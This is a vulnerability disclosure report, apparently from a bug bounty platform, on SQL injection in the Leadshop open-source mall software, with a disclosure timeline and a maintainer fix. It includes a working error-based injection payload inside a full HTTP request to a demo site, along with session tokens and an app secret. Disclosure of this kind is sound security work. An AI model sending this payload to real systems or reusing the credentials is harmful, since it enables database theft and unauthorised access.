SQL injection at exportUsers function in qmpaas/leadshop
Valid
Reported on
May 26th 2022
Description
SQL injection at exportUsers function via sort query parameter
Proof of Concept
GET /index.php?q=/api/leadmall/statistical&behavior=exportGoods&sort={"updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)--+-":"asd"} HTTP/1.1
Host: demo.leadshop.vip
Cookie: _csrf=fefe3c31fa6dbee72cd8e6a1e3b010398cfeed682f0198b879af18dbd5d5e5c8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22SQDJuf-G631HB3SFwAjpH8ZW9XfM-nci%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImF1ZCI6Imh0dHBzOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyIsImlhdCI6MTY1MzU4MzAxNiwiZXhwIjoxNjU2MTc1MDE2LCJpZCI6MX0.O11reWZxDohDWiW9eqeTK0mvvxVy_xwwM4h7g5lwjXs
Qm-App-Type: undefined
Qm-App-Id: 98c08c25f8136d590c
Qm-App-Secret: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Origin: https://demo.leadshop.vip
Referer: https://demo.leadshop.vip/index.php?r=admin%2Findex
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close
Poc Image
Impact
An attacker can modify the query and can retrieve all data in database.
We are processing your report and will contact the
qmpaas/leadshop
team within 24 hours.
2 months ago
We have contacted a member of the
qmpaas/leadshop
team and are waiting to hear back
2 months ago
We have sent a
follow up to the
qmpaas/leadshop
team.
We will try again in 7 days.
2 months ago
We have sent a
second
follow up to the
qmpaas/leadshop
team.
We will try again in 10 days.
2 months ago
No update. Let's wait for the remaining notifications to go out to the maintainer. Once the final notification has been sent, feel free to get in touch again, and I will reach out to the maintainers on your behalf 👍
We have sent a
third and final
follow up to the
qmpaas/leadshop
team.
This report is now considered stale.
2 months ago
Hi @admin, look like Maintainer fixed at https://github.com/qmpaas/leadshop/commit/44dba1c86b7b2cfcd4594a25335f8628b650d37e#diff-2f55bd65e7f3d17890b89a77f76ee040e12d09519ff5668c12ffefc40ecdb2cc
The researcher's credibility has increased: +7
leadshop开源商城
has been awarded the fix bounty
We can, as long as the maintainer is happy to assign and publish one for this report.
@maintainer?
to join this conversation